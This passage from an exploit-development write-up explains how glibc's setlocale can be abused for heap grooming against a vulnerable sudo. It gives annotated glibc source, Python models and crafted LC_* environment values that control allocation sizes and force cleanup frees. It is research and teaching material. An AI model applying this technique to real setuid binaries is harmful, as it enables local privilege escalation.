9. Heap Fengshui

Knowing how NSS objects are allocated at runtime, the next step is to find a function that lets us control heap allocation before get_user_info() — the “first use” of nss_load_library — is called.

From the heap traces and function tree mapping earlier, one helper stands out right at program startup:

fuzz_sudo_1-64

It is the Linux setlocale call, which sets the program locale.

9.1. Setlocale

This is a classic heap-shaping primitive in Linux exploitation — and, as recently noted in CVE-2025-4802, it has real security implications:

Untrusted LD_LIBRARY_PATH environment variable vulnerability in the GNU C Library version 2.27 to 2.38 allows attacker controlled loading of dynamically shared library in statically compiled setuid binaries that call dlopen (including internal dlopen calls after setlocale or calls to NSS functions such as getaddrinfo).

Despite being well-known in the PWN community, its role as a heap grooming primitive is rarely documented. Here, we explain its relevance to our vulnerable sudo binary.

9.1.1. Overview

setlocale(int, const char*) is the C/POSIX API that sets the process locale (or returns the current one if locale == NULL):

C
#include <locale.h>

char *setlocale(int category, const char *locale);

It's described in IBM docs as:

Sets, changes, or queries locale categories or groups of categories. It does this action according to values of the locale and category arguments.

Key points:

  • At program start, the default locale is "C" (POSIX/ASCII).
  • Calling setlocale(LC_ALL, "") makes glibc consult the environment (LC_ALL, each LC_*, then LANG).
  • This reconfigures global process state:
    • LC_CTYPE → UTF-8/multibyte handling (mbrtowc, isalpha, …)
    • LC_NUMERIC → decimal/grouping rules (affects printf, strtod)
    • LC_TIME, LC_COLLATE, LC_MONETARY, LC_MESSAGES → time formats, collation, currency, gettext messages

In practice, setlocale is almost always called very early in main(), because:

  1. Many libc calls depend on locale (UTF-8, parsing, I/O).
  2. It must run before threads start (locale is global state).
  3. Frameworks like gettext require it to bootstrap message catalogs.
  4. It incurs filesystem lookups and heap allocations, which are cheaper and deterministic when done once up front.

Typical patterns:

C
#include <locale.h>

int main(void) {
    setlocale(LC_ALL, "");          // honor LC_ALL/LC_* / LANG from env
    // If we need dot as decimal regardless of UI locale:
    // setlocale(LC_NUMERIC, "C");
    // … init gettext, libraries, etc.
}

Looking at sudo.c, we confirm the early call in main:

fuzz_sudo_1-65

Here, the call setlocale(LC_ALL, ""):

  • Reads LC_ALL, each LC_* (e.g., LC_CTYPE, LC_MESSAGES), then LANG from the environment.
  • Configures glibc's global process locale (ctype, messages, collation, numeric, time, monetary).
  • Internals we'll hit in glibc: setlocale → _nl_find_locale / _nl_load_locale, and sometimes newlocale-style builders.
  • Side effects: heap allocations for the active locale object and per-category name buffers, plus filesystem lookups under /usr/lib/locale or /usr/share/locale.

What matters for our exploit is that calling setlocale(LC_ALL, "") results in several mallocs (category names, locale structures) plus string processing for each category we set via LC_*. Different env values change the number and size of the internal buffers and candidate path lists.

This makes setlocale a perfect heap fengshui gadget for our attack!

9.1.2. Functions

9.1.2.1. setlocale

This means we can steer heap allocation through setlocale by feeding it crafted environment values before the program starts. Its glibc implementation is in locale/setlocale.c:

C
char *
setlocale (int category, const char *locale)
{
  char *locale_path;
  size_t locale_path_len;
  const char *locpath_var;
  char *composite;

  ...

  // Prepare LOCPATH search list (where to look for locale data)
  locpath_var = getenv ("LOCPATH");
  // Build an argz list from LOCPATH and append the default locale path
  ...

  // [*] Two main modes (determined by `category`):
  //     1) LC_ALL: handle all categories at once. Composite parsing happens
  //        only if the second argument `locale` literally contains ';'.
  //        (In sudo: `setlocale(LC_ALL, "")` → not a composite string.)
  //     2) single category: set just that one

  // Mode 1: LC_ALL
  if (category == LC_ALL)
    {
      // We may receive a composite string. 
    	// a) newnames[] will hold per–category locale name strings
    	//    e.g., "C.UTF-8@<padding>", "en_US.UTF-8", or the builtin "_nl_C_name"
      const char *newnames[__LC_LAST];
      // b) newdata[] is the per–category loaded locale objects
    	//    returned by `_nl_find_locale` later
      struct __locale_data *newdata[__LC_LAST];
      char *locale_copy = NULL;		// copy to destructively split CAT=VAL;...

      // Initialize: default all per-category names to the raw 'locale' arg
      // (NOT the environment yet. Env is consulted later inside `_nl_find_locale`)
      for (category = 0; category < __LC_LAST; ++category)
          if (category != LC_ALL)
              newnames[category] = (char *) locale;

      // If the string contains ';', treat it as a composite and parse:
      //     "CATEGORY=VALUE;CATEGORY=VALUE;...".
      if (__glibc_unlikely (strchr (locale, ';') != NULL))
          {		
            /* This is a composite name.  Make a copy and split it up.  */
            locale_copy = __strdup (locale);
            ...
            char *np = locale_copy;
            char *cp;
            int cnt;

            // Iterate "CAT=VAL" clauses
            while ((cp = strchr (np, '=')) != NULL)
                {
                    // Match the category name to one of the known LC_* names
                    for (cnt = 0; cnt < __LC_LAST; ++cnt)
                        ...

                    // Store pointer to VALUE; terminate at ';' (if any)
                    newnames[cnt] = ++cp;
                    cp = strchr (cp, ';');
                    ...

      /* Load the new data for each category.  */
      while (category-- > 0)
        if (category != LC_ALL)		// Resolve and load locale data for each category (except LC_ALL)
          {	
            // [!] _nl_find_locale consults env (LC_ALL → LC_<cat> → LANG → "C")
            //	   if `*newnames[category]` points to "" (common in sudo case)
            //     Returns a locale-data object on success, or NULL on failure
            newdata[category] = _nl_find_locale (			
                                  locale_path, 
                                  locale_path_len,
                                  category,
                                  &newnames[category]
            								    );

            if (newdata[category] == NULL)
              {
                ...
                break;	// Any failure aborts the composite setup
              }

            // For those good env values
            // Mark them as undeletable
            if (newdata[category]->usage_count != UNDELETABLE)
                newdata[category]->usage_count = UNDELETABLE;	
    
            // Intern the name string:
            // - If equals current global name, just alias pointer
            // - [!] Else, duplicate (allocates) to store as stable name
            //       -- Controllable allocation: size ≈ strlen(value)+1
            if (newnames[category] != _nl_C_name)
              {
                if (strcmp (newnames[category],
                            _nl_global_locale.__names[category]) == 0)
                    newnames[category] = _nl_global_locale.__names[category];
                else
                  {
                    // [!] Duplicate the category name string
                    // 
                  	//     In this LC_ALL/"" path, `_nl_find_locale()` has just updated
                  	//     newnames[category]. If locale=="" it chose from the environment
                  	//     (LC_ALL → LC_<category> → LANG → "C"), possibly after alias expansion.
                  	//     We now strdup that chosen name to make it stable.
                  	//
                  	//     This strdup's size is controllable via the length of the env value
                    //     (when LC_ALL is unset and we set LC_<category>/LANG). These
                    //     duplicates are the ones freed in the cleanup path on failure.
                    newnames[category] = __strdup (newnames[category]);	
                    if (newnames[category] == NULL)
                      break;
                  }
                }
              }            

      // Build a canonical composite LC_ALL string from the per-category names
      composite = (category >= 0
                      // If any category failed earlier, composite == NULL
                      ? NULL : new_composite_name (LC_ALL, newnames));
      // If composition string was built successfully
      if (composite != NULL)
          {
              // Commit: install new data and names into the global locale
              for (category = 0; category < __LC_LAST; ++category)
                  if (category != LC_ALL)
                      {
                          setdata (category, newdata[category]);	// set __locale_data
                          setname (category, newnames[category]);	// set name string
                      }
              setname (LC_ALL, composite);	// set LC_ALL string
              ...
          }
      // [!] Cleanup path:
      //     If build failed ⟶ free duplicated name strings allocated above!
      else
          // Cleanup: free duplicated names if we failed mid-way
          for (++category; category < __LC_LAST; ++category)
              if (category != LC_ALL && newnames[category] != _nl_C_name
                          && newnames[category] != _nl_global_locale.__names[category])
                free ((char *) newnames[category]);	// [!] Free all data (allocated heap chunks)
  
      ...
      return composite;
  }
  // Mode 2, not our concern
  else
    {
      ...
    }
}
libc_hidden_def (setlocale)

A summary of what we can leverage from setlocale() for heap fengshui:

  1. setlocale(LC_ALL, "...") handles either a single name or a composite literal ("LC_CTYPE=...;LC_MESSAGES=...;..."). In sudo, it's actually setlocale(LC_ALL, ""), so names come from the environment per category.
  2. For each target category, it calls _nl_find_locale(locale_path, len, category, &newnames[category]):
    • Validates/parses the value and chooses the name string (from LC_ALL → LC_<cat> → LANG → "C"), possibly alias-expanded.
    • Loads and returns a struct __locale_data * for that category.
  3. Independently of the __locale_data, it duplicates the category name string (unless it's the builtin C) via __strdup(newnames[category]).
    1. strdup calls malloc internally—this is the allocation we control.
    2. These are controllable-size allocations: size ≈ strlen(LC_* value) + 1, then rounded by malloc.
    3. The count of such allocations equals the number of categories that succeed up to the failure point (and for which the name isn't the builtin C nor identical to the current global name).
  4. If any category later fails (invalid name/value, allocation failure, etc.), composite == NULL and the function goes down the cleanup path:
    • It frees the already duplicated name strings in a loop: free((char *)newnames[category]);
    • This yields multiple back-to-back frees of attacker-chosen sizes.
  5. If all succeed, those duplicates persist (no frees). For grooming, intentionally induce a failure after staging several categories.
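The five points above can be condensed into a small model. The following Python sketch is not glibc code: `simulate_lc_all` and the `resolve` callback are hypothetical names, and the model ignores the "name equals the current global name" shortcut as well as every allocation made inside _nl_find_locale. It only tracks which strdup requests are made and which are released by the cleanup loop.

```python
# Simplified model of the LC_ALL branch of setlocale(); illustrative only.
LC_ALL = 6
LC_LAST = 13  # category IDs run 0..12


def simulate_lc_all(resolve):
    """resolve(category) returns the chosen name, or None on failure.

    Returns (allocs, frees): lists of (category, request_size) in the
    order in which the model performs them.
    """
    names = {}
    allocs, frees = [], []
    category = LC_LAST
    failed = False
    while category > 0:          # mirrors `while (category-- > 0)`
        category -= 1
        if category == LC_ALL:
            continue
        name = resolve(category)
        if name is None:         # _nl_find_locale returned NULL
            failed = True
            break
        if name != "C":          # the builtin name is never duplicated
            names[category] = name
            allocs.append((category, len(name) + 1))  # strdup request
    if failed:
        # Cleanup loop: ascending, starting after the failed category.
        for cat in range(category + 1, LC_LAST):
            if cat in names:
                frees.append((cat, len(names[cat]) + 1))
    return allocs, frees


if __name__ == "__main__":
    def demo(cat):
        # Two padded categories, then a failure at LC_CTYPE (ID 0).
        if cat == 0:
            return None
        return "C.UTF-8@" + "A" * 15 if cat in (11, 12) else "C"

    print(simulate_lc_all(demo))
```

Note that in this model the allocations happen from the highest category ID downward, while the cleanup frees run upward from the category just above the one that failed.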

To map values to bins later, we use a common prefix and vary only the padding:

value = "C.UTF-8@" + N*'A'

The request size is then:

strlen(value) + 1 = 9 + N

We will explain the locale composition format later.
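To turn the 9 + N request size into an actual chunk size, we can mimic malloc's rounding. This is a minimal sketch that assumes a 64-bit glibc (8-byte size field, 16-byte alignment, 0x20 minimum chunk); `chunk_size` and `strdup_chunk` are illustrative helper names, not glibc symbols.

```python
SIZE_SZ = 8            # assumed: 64-bit glibc
MALLOC_ALIGNMENT = 16  # assumed: x86-64 default
MINSIZE = 0x20         # assumed: smallest chunk on 64-bit


def chunk_size(request):
    """Approximate the chunk size malloc picks for a request of `request` bytes."""
    size = (request + SIZE_SZ + MALLOC_ALIGNMENT - 1) & ~(MALLOC_ALIGNMENT - 1)
    return max(size, MINSIZE)


def strdup_chunk(n):
    """Chunk size used when strdup() copies "C.UTF-8@" followed by n 'A's."""
    value = "C.UTF-8@" + "A" * n
    return chunk_size(len(value) + 1)  # +1 for the NUL terminator


if __name__ == "__main__":
    for n in (0, 15, 16, 143):
        print(n, hex(strdup_chunk(n)))
```

Under these assumptions, every 16 extra padding bytes move the duplicated name up one bin.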

We've established an allocation→free primitive via setlocale(LC_ALL, ""):

  • Successful categories strdup(name) → allocations;
  • A later failure triggers cleanup → frees of those chunks.

Next, we dive into _nl_find_locale to learn:

  1. how it chooses the per-category name (size we allocate), and
  2. how to deterministically trigger a failure (when the frees happen).

Understanding these two levers lets us control both allocation sizes and the timing of the cleanup frees for heap fengshui.

9.1.2.2. _nl_find_locale

The internal callee _nl_find_locale translates env-provided locale strings into loaded locale objects. It matters for heap shaping in three ways: where inputs are parsed, where allocations happen, and where we can deliberately make it return NULL to drive the setlocale() cleanup frees noted above:

C
struct __locale_data *
_nl_find_locale (const char *locale_path, size_t locale_path_len,
                 int category, const char **name)
{
  int mask;
  /* Name of the locale for this category.  */
  const char *cloc_name = *name;
  const char *language;
  const char *modifier;
  const char *territory;
  const char *codeset;
  const char *normalized_codeset;
  struct loaded_l10nfile *locale_file;

  ...

  // 1) [ENV] 
  //    If empty name was passed, consult ENV in precedence order:
  //       LC_ALL → LC_<category> → LANG → "C".
  //    This is the point where our LC_* env actually enters the pipeline    
  if (cloc_name[0] == '\0')
    {
      /* The user decides which locale to use by setting environment variables.  */
      cloc_name = getenv ("LC_ALL");		// Check env `LC_ALL` first
      if (!name_present (cloc_name))
          cloc_name = getenv (_nl_category_names.str
                      + _nl_category_name_idxs[category]);	// Check special env
      if (!name_present (cloc_name))
          cloc_name = getenv ("LANG");	// Check env `LANG`
      if (!name_present (cloc_name))
          cloc_name = _nl_C_name;			  // falls back to "C"
    }


  // 2) [FAST-PATH] 
  //    Builtins "C"/"POSIX": no file I/O, no heap churn here
  if (__builtin_expect (strcmp (cloc_name, _nl_C_name), 1) == 0
        || __builtin_expect (strcmp (cloc_name, _nl_POSIX_name), 1) == 0)
    {
      //  We need not load anything.  The needed data is contained in the library itself
      *name = _nl_C_name;
      return _nl_C[category];
    }

  // 3) Basic sanity on the locale string (blocks traversal, bad chars).
  //    If invalid, hard-fail → returns NULL
  if (!valid_locale_name(cloc_name)) 
    {
      __set_errno(EINVAL);
      return NULL;  // [FAILURE TRIGGER #1] Invalid locale name → immediate NULL
    }

  //  --- From here, we really have to load some data ---
  *name = cloc_name;

  // 4) [PATH] 
  //    Without LOCPATH, fall back to archive → default search path
  if (__glibc_likely (locale_path == NULL))
    {
      ...

      // Nothing in the archive with the given name 
      // Expanding it as an alias and retry
      cloc_name = _nl_expand_alias (*name);
      if (cloc_name != NULL)
	    ...

      // Nothing in the archive.  Set the default path to search below
      locale_path = _nl_default_locale_path;
      locale_path_len = sizeof _nl_default_locale_path;
    }
  else
    // We really have to load some data 
    // First see whether the name is an alias  
    // Note that this makes it impossible to have "C" or "POSIX" as aliases
    cloc_name = _nl_expand_alias (*name);	

  if (cloc_name == NULL)
    /* It is no alias.  */
    cloc_name = *name;

  // 5) [PARSE & CHECK]
  //    Parse XPG syntax: language[_territory[.codeset]][@modifier]
  //    Produces pointers to each part + a mask of which exist
  //    [ALLOCATION] ⟶ stack
    
  // Make a writable copy of the locale name
  char *loc_name = strdupa (cloc_name);		// strdupa() uses stack (via alloca); no heap allocation here
    
  /* LOCALE can consist of up to four recognized parts for the XPG syntax:

  [!]  language[_territory[.codeset]][@modifier]

  Beside the first all of them are allowed to be missing.  If the
  full specified locale is not found, the less specific one are
  looked for.  The various part will be stripped off according to
  the following order:
		(1) codeset
		(2) normalized codeset
		(3) territory
		(4) modifier
   */
    
  mask = _nl_explode_name (loc_name, &language, &modifier, &territory,
			   				&codeset, &normalized_codeset);
  
  // [!] mask == -1 signals an allocation failure inside _nl_explode_name, not a syntax error
  if (mask == -1)
    return NULL;
  // [FAILURE TRIGGER #2] OOM during explode → NULL

  // 6) [LIST]
  //    _nl_make_l10nflist builds a candidate list/graph (heap)
  //    [ALLOCATION] ⟶ heap
    
  /* If exactly this locale was already asked for we have an entry with
     the complete name.  */
  locale_file = _nl_make_l10nflist (&_nl_locale_file_list[category],		// Also heap allocation inside
                        				    locale_path, locale_path_len, mask,
                        				    language, territory, codeset,
                        				    normalized_codeset, modifier,
                        				    _nl_category_names.str
                        				    + _nl_category_name_idxs[category], 0);

  // “Out of core” fallback: try scanning all dirs; still allocates nodes
  if (locale_file == NULL)
    {
      /* Find status record for addressed locale file.  We have to search
	     through all directories in the locale path.  */
      locale_file = _nl_make_l10nflist (&_nl_locale_file_list[category],	// Also heap allocation inside
                              					locale_path, locale_path_len, mask,
                              					language, territory, codeset,
                              					normalized_codeset, modifier,
                              					_nl_category_names.str
                              					+ _nl_category_name_idxs[category], 1);
      // If still fail
      if (locale_file == NULL)
	    /* This means we are out of core.  */
	    return NULL;
      // [FAILURE TRIGGER #3] OOM → NULL (rare but valid)
    }

  /* The space for normalized_codeset is dynamically allocated.  Free it.  */
  if (mask & XPG_NORM_CODESET)
    free ((void *) normalized_codeset);		// [FREE] not attacker-controlled size

  if (locale_file->decided == 0)
    _nl_load_locale (locale_file, category);	// [LOAD] Actually load LC_* data 

  // 7) [FALLBACK]
  //    If it didn't load, try successors
  if (locale_file->data == NULL)
    {
      int cnt;
      for (cnt = 0; locale_file->successor[cnt] != NULL; ++cnt)
      	{
      	  if (locale_file->successor[cnt]->decided == 0)
      	    _nl_load_locale (locale_file->successor[cnt], category);
      	  if (locale_file->successor[cnt]->data != NULL)
      	    break;
      	}
      /* Move the entry we found (or NULL) to the first place of
	 successors.  */
      locale_file->successor[0] = locale_file->successor[cnt];
      locale_file = locale_file->successor[cnt];

      // If all fail, return NULL
      if (locale_file == NULL)
        return NULL;	// [FAILURE TRIGGER #4] No loadable data → NULL
    }

  // 8) Optional “codeset sanity” check
  //    If the user specified a .codeset
  //    and it doesn't match what the loaded LC_* data declares 
  //    (post-alias, case-folded) ⟶ reject
  if (codeset != NULL)
    {
      /* Get the codeset information from the locale file.  */
      static const int codeset_idx[] =
        {
          [__LC_CTYPE] = _NL_ITEM_INDEX (CODESET),
          [__LC_NUMERIC] = _NL_ITEM_INDEX (_NL_NUMERIC_CODESET),
          [__LC_TIME] = _NL_ITEM_INDEX (_NL_TIME_CODESET),
          [__LC_COLLATE] = _NL_ITEM_INDEX (_NL_COLLATE_CODESET),
          [__LC_MONETARY] = _NL_ITEM_INDEX (_NL_MONETARY_CODESET),
          [__LC_MESSAGES] = _NL_ITEM_INDEX (_NL_MESSAGES_CODESET),
          [__LC_PAPER] = _NL_ITEM_INDEX (_NL_PAPER_CODESET),
          [__LC_NAME] = _NL_ITEM_INDEX (_NL_NAME_CODESET),
          [__LC_ADDRESS] = _NL_ITEM_INDEX (_NL_ADDRESS_CODESET),
          [__LC_TELEPHONE] = _NL_ITEM_INDEX (_NL_TELEPHONE_CODESET),
          [__LC_MEASUREMENT] = _NL_ITEM_INDEX (_NL_MEASUREMENT_CODESET),
          [__LC_IDENTIFICATION] = _NL_ITEM_INDEX (_NL_IDENTIFICATION_CODESET)
        };
      const struct __locale_data *data;
      const char *locale_codeset;
      char *clocale_codeset;
      char *ccodeset;

      data = (const struct __locale_data *) locale_file->data;
      locale_codeset = (const char *) data->values[codeset_idx[category]].string;
      assert (locale_codeset != NULL);
      /* Note the length of the allocated memory: +3 for up to two slashes
	     and the NUL byte.  */
      clocale_codeset = (char *) alloca (strlen (locale_codeset) + 3);
      strip (clocale_codeset, locale_codeset);

      ccodeset = (char *) alloca (strlen (codeset) + 3);
      strip (ccodeset, codeset);

      if (__gconv_compare_alias (upstr (ccodeset, ccodeset),
                                upstr (clocale_codeset,
								 	                    clocale_codeset)) != 0)
	    /* The codesets are not identical, don't use the locale.  */
	    return NULL;	// [FAILURE TRIGGER #5] User-specified .codeset mismatch → NULL.
      // This is a reliable knob to force failure after earlier successes
    }

  // 9) Persist the resolved actual locale name into the data object.
  //    This __strndup() is a real heap allocation (size ~ len("<locale>"))
  //    The format is <path>/<locale>/LC_foo
  //    We must extract the <locale> part
  if (((const struct __locale_data *) locale_file->data)->name == NULL)
    {
      char *cp, *endp;

      endp = strrchr (locale_file->filename, '/');
      cp = endp - 1;
      while (cp[-1] != '/')
	    --cp;
      ((struct __locale_data *) locale_file->data)->name
	              = __strndup (cp, endp - cp);
      // [ALLOCATION] __strndup stores canonical locale name in data->name (heap)
    }

  // 10) Optional flag from @modifier
  if (modifier != NULL
      		&& __strcasecmp_l (modifier, "TRANSLIT", _nl_C_locobj_ptr) == 0)
    ((struct __locale_data *) locale_file->data)->use_translit = 1;

  // 11) Bump usage count; caller may later mark UNDELETABLE
  if (((const struct __locale_data *) locale_file->data)->usage_count
    	< MAX_USAGE_COUNT)
    ++((struct __locale_data *) locale_file->data)->usage_count;

  return (struct __locale_data *) locale_file->data;
}

Its role is simple:

Translates env-provided locale names into a loaded __locale_data* for a given category. If anything looks wrong or cannot be loaded, it returns NULL.

In conclusion, the function:

  • Reads locale from env with precedence LC_ALL → LC_<category> → LANG → "C".
  • Fast-path for "C"/"POSIX": returns builtin data, no heap work.
  • valid_locale_name check: reject bad names early → NULL.
  • If LOCPATH is unset, try the locale archive first (retrying with the alias-expanded name), then fall back to the default search path; if LOCPATH is set, only expand aliases.
  • Copy the name to the stack via strdupa, then parse the XPG syntax language[_territory[.codeset]][@modifier] with _nl_explode_name; a return value of -1 signals OOM → NULL.
  • Build/lookup candidate list via _nl_make_l10nflist (heap allocations). If failure, OOM → NULL.
  • Load the chosen candidate via _nl_load_locale; if it fails, try successors. If all fail → NULL.
  • Optional codeset sanity: if user specified .codeset and it doesn't match the loaded data after alias/uppercasing, reject → NULL.
  • Store canonical locale name via __strndup into data->name (heap), set use_translit if @translit, bump usage_count, and return the data; on failure, returns NULL.

Two properties of _nl_find_locale matter for heap grooming:

  • It chooses/aliases the name string that setlocale later __strdups → this is our size knob (via LC_<category> lengths, with LC_ALL unset).
  • It provides deterministic NULL exits to trigger setlocale's cleanup frees after some categories have already allocated:
    • invalid name (valid_locale_name),
    • no loadable candidate (after successors),
    • codeset mismatch.

Before we start tuning per-category locale strings, we need one last detail from _nl_find_locale: how the numeric category value maps to the concrete LC_* name.

9.1.3. Category IDs

To craft heap allocations deterministically, we need to know which LC_* env vars glibc actually looks at. Internally, glibc assigns each category a numeric ID (used as an index into lookup tables).

From locale/bits/locale.h:

C
#if !defined _LOCALE_H && !defined _LANGINFO_H
# error "Never use <bits/locale.h> directly; include <locale.h> instead."
#endif

#ifndef _BITS_LOCALE_H
#define _BITS_LOCALE_H		 

#define __LC_CTYPE           0
#define __LC_NUMERIC         1
#define __LC_TIME            2
#define __LC_COLLATE         3
#define __LC_MONETARY        4
#define __LC_MESSAGES        5
#define __LC_ALL             6
#define __LC_PAPER           7
#define __LC_NAME            8
#define __LC_ADDRESS         9
#define __LC_TELEPHONE      10
#define __LC_MEASUREMENT    11
#define __LC_IDENTIFICATION 12

#endif	/* bits/locale.h */

The public macros LC_CTYPE, LC_TIME, etc. are just wrappers around these.

Inside glibc, functions like _nl_find_locale(category, …) use the numeric ID to fetch the right env variable name via a table:

C
const char *catname =
    _nl_category_names.str + _nl_category_name_idxs[category];  // e.g. "LC_TIME"
const char *val = getenv(catname);  // fetches LC_TIME, LC_MONETARY, etc.

That's why we see:

cloc_name = getenv(_nl_category_names.str + _nl_category_name_idxs[category]);

Precedence logic:

  1. LC_ALL (string literal)
  2. LC_<category> (derived via the index above)
  3. LANG
  4. fallback to "C"
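The precedence list above can be sketched as a small lookup. This is an illustrative Python model, not glibc code: `CATEGORY_NAMES` stands in for the `_nl_category_names` table, `name_present` mirrors the empty-or-unset check seen in the source, and `choose_name` is a hypothetical helper name.

```python
# Category ID -> environment variable name (ID 6, LC_ALL, is not a real slot).
CATEGORY_NAMES = {
    0: "LC_CTYPE", 1: "LC_NUMERIC", 2: "LC_TIME", 3: "LC_COLLATE",
    4: "LC_MONETARY", 5: "LC_MESSAGES", 7: "LC_PAPER", 8: "LC_NAME",
    9: "LC_ADDRESS", 10: "LC_TELEPHONE", 11: "LC_MEASUREMENT",
    12: "LC_IDENTIFICATION",
}


def name_present(value):
    """An unset or empty variable counts as absent."""
    return value is not None and value != ""


def choose_name(category, env):
    """Pick the locale name for `category` when setlocale() is passed ""."""
    for var in ("LC_ALL", CATEGORY_NAMES[category], "LANG"):
        value = env.get(var)
        if name_present(value):
            return value
    return "C"


if __name__ == "__main__":
    env = {"LANG": "en_US.UTF-8", "LC_TIME": "C.UTF-8@AAAA"}
    for cat in sorted(CATEGORY_NAMES, reverse=True):
        print(CATEGORY_NAMES[cat], "->", choose_name(cat, env))
```

The model makes one practical point visible: as soon as LC_ALL is set to a non-empty value, every per-category variable is ignored, which is why the grooming strategy relies on LC_ALL being unset.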

Concrete example workflow:

C
setlocale(LC_TIME, "");       // LC_TIME == __LC_TIME == 2
// Inside _nl_find_locale(category=2):
// 1) cloc_name = getenv("LC_ALL");
// 2) if empty, cloc_name = getenv("LC_TIME");   // name derived from category id 2
// 3) else getenv("LANG"); else "C"
// Then resolve/load data for the TIME category and return it.

This means when sudo.c:main calls:

C
setlocale(LC_ALL, "");

glibc walks category IDs 12 down to 0 (skipping 6, which is LC_ALL itself), and for each one resolves the name as:

LC_ALL → LC_<category> → LANG → "C"

→ The env values chosen here drive the strdup() allocations we can shape.

Thus, by prepping environment vars (LC_TIME, LC_MESSAGES, etc.) with strings of chosen length, we decide both how many allocations occur and their exact sizes. If we later trigger a failure path, glibc frees them all in order — giving us a very deterministic alloc→free primitive for heap fengshui.

9.2. The Primitives

Now we understand how to twist setlocale into a heap-fengshui lever:

  • Goal: perform a series of predictable allocations followed by predictable frees right after process startup to seed tcache/fastbin with chunks of sizes we control.
  • Primitive: supply LC_* values (or a composite LC_ALL string) such that:
    1. several categories succeed → each success calls __strdup, allocating a chunk of strlen(value)+1.
    2. one later category fails → the cleanup path frees all previously duplicated chunks back-to-back.
  • Effect: we deterministically enqueue N chunks of chosen sizes into the free lists, ready to be re-used by NSS allocations (service_user, service_library, etc.) later.

Since sudo calls setlocale(LC_ALL, ""), glibc pulls locale names per category directly from the environment. This gives us granular control.

9.2.1. Allocation Primitive

To guarantee allocation, we must pass a valid locale string that won't collapse to a shorter alias. The trick: abuse the modifier field (@...) of locale names. Glibc preserves everything after @.

Safe pattern:

C.UTF-8@<padding>

With this, the malloc request size is:

request = strlen(value) + 1 = 9 + N

Mapping to glibc bins (including the 0x10 header):

Target bin (header)    Request range    Choose N (since request = 9+N)
0x20 (0x21 shown)      1..24            0..15
0x30 (0x31)            25..40           16..31
0x40 (0x41)            41..56           32..47
0x50 (0x51)            57..72           48..63
0x60 (0x61)            73..88           64..79
0x70 (0x71)            89..104          80..95
0x80 (0x81)            105..120         96..111
0x90 (0x91)            121..136         112..127
0xA0 (0xA1)            137..152         128..143

So:

  • unset LC_ALL (optional, it's unset by default),
  • set per-category env vars (LC_CTYPE, LC_TIME, LC_MESSAGES, …) to "C.UTF-8@" + "A"*N.

Each category gives us one allocation of size tuned by N.

Avoid forms like .utf8 that might alias to .UTF-8 and change length.
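Going the other way, from a target chunk size to a concrete env value, is simple arithmetic. The sketch below assumes the same 64-bit rounding as the table (a chunk of size c serves requests c-23 through c-8) and the "C.UTF-8@" prefix; `padding_range` and `build_env` are hypothetical helper names.

```python
PREFIX = "C.UTF-8@"  # 8 bytes, so request = 9 + N


def padding_range(chunk):
    """Return (min_n, max_n) of padding lengths that land in `chunk`."""
    if chunk < 0x20 or chunk % 0x10 != 0:
        raise ValueError("chunk size must be a multiple of 0x10 and >= 0x20")
    overhead = len(PREFIX) + 1            # prefix plus NUL terminator
    max_n = (chunk - 8) - overhead        # largest request served is chunk - 8
    min_n = max(0, (chunk - 23) - overhead)
    return min_n, max_n


def build_env(plan):
    """plan maps an LC_* variable name to a target chunk size."""
    env = {}
    for var, chunk in plan.items():
        _, max_n = padding_range(chunk)
        env[var] = PREFIX + "A" * max_n   # use the largest padding that fits
    return env


if __name__ == "__main__":
    for var, value in build_env({"LC_PAPER": 0x70, "LC_NAME": 0x60}).items():
        print(f"{var}={value}")
```

Picking the largest N in each range matches the values used later in this chapter (15, 31, 47, ...), but any N inside the range should reach the same bin.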

9.2.2. Free Primitive

Once we have a few categories staged with allocations, we need to trigger the cleanup path to free them all.

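Simplest move: make a category that is processed later fail resolution. Because setlocale walks the categories from the highest ID down, "later" means a lower category ID. Example:

export LC_TELEPHONE="bad/locale"

When _nl_find_locale can't resolve it, setlocale aborts the composite setup and frees every name it has strdup'd so far. With LC_TELEPHONE (ID 10) as the trip wire, only LC_IDENTIFICATION (12) and LC_MEASUREMENT (11) are processed before the failure, so to free as many chunks as possible the bad value belongs in LC_CTYPE (ID 0), which is processed last.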
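Why does a value like "bad/locale" fail so reliably? The sketch below is an approximate Python model of the name check, written from my reading of valid_locale_name in glibc's locale/findlocale.c. The exact rules (including the 255-byte length limit) are assumptions here and should be verified against the glibc version under test.

```python
def valid_locale_name(name):
    """Approximate model of glibc's valid_locale_name(); not authoritative."""
    if len(name) > 255:                 # assumed upper bound on the name length
        return False
    if "/.." in name or name == "..":   # directory traversal attempts
        return False
    if name.startswith("../"):
        return False
    if "/" in name and not name.startswith("/"):
        return False                    # a slash is only allowed in absolute paths
    return True


if __name__ == "__main__":
    for candidate in ("C.UTF-8@AAAA", "en_US.UTF-8", "bad/locale", "../etc"):
        print(candidate, valid_locale_name(candidate))
```

If the model holds, two practical consequences follow: a relative name containing a slash is rejected before any file lookup happens, and padded names must stay within the length limit or they turn into failure triggers themselves.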

9.3. Dynamic Debugging

To actually see the primitive in motion, we'll set up a minimal playground and watch glibc allocate and (sometimes) free the chunks for us.

Our plan:

  1. Call setlocale(LC_ALL, "") at startup.
  2. Feed specific per-category LC_* env values whose lengths map to chosen bins.
  3. Force a later category to fail, so setlocale takes the cleanup path and frees the earlier chunks back into tcache.

Tiny target program:

C
// build: gcc -O0 -g loc.c -o loc
#define _GNU_SOURCE
#include <stdio.h>
#include <locale.h>

int main(void) {
    setlocale(LC_ALL, "");  // pulls per-category from env
    puts("done");
    return 0;
}

9.3.1. Setlocale Workflow

Let's first run it with no crafted env vars, and trace how _nl_find_locale behaves when setlocale(LC_ALL, "") is called:

fuzz_sudo_1-66

Because no LC_ALL or LC_* is set, it falls back to LANG. On our system, LANG=en_US.UTF-8, so that becomes the candidate locale string.

Then _nl_find_locale parses/validates it and returns a pointer to a freshly loaded struct __locale_data object for "en_US.UTF-8":

fuzz_sudo_1-67

At this point, the newnames[category] array is populated:

fuzz_sudo_1-68

Each index corresponds directly to a locale category ID:

C
// newnames[] is indexed DIRECTLY by the locale category ID.
// The array is NOT reversed. What's reversed is the processing order
// when setlocale(LC_ALL, ...) iterates categories from high→low because of `while category--`.

#define __LC_CTYPE           0   // newnames[0]
#define __LC_NUMERIC         1   // newnames[1]
#define __LC_TIME            2   // newnames[2]
#define __LC_COLLATE         3   // newnames[3]
#define __LC_MONETARY        4   // newnames[4]
#define __LC_MESSAGES        5   // newnames[5]
#define __LC_ALL             6   // (not a real per-category slot; skipped)
#define __LC_PAPER           7   // newnames[7]
#define __LC_NAME            8   // newnames[8]
#define __LC_ADDRESS         9   // newnames[9]
